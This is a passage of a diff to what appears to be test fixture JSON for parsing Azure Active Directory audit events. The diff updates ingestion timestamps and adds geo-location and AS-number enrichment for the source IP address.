"67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124912500Z", + "ingested": "2021-12-14T14:48:43.176644293Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -2805,6 +2985,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2971,7 +3163,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124918900Z", + "ingested": "2021-12-14T14:48:43.176645139Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -2998,6 +3190,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3164,7 +3368,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124925700Z", + "ingested": "2021-12-14T14:48:43.176645932Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -3191,6 +3395,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3357,7 +3573,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124932400Z", + "ingested": "2021-12-14T14:48:43.176646557Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -3384,6 +3600,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3528,7 +3756,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124939Z", + "ingested": "2021-12-14T14:48:43.176647289Z", "original": 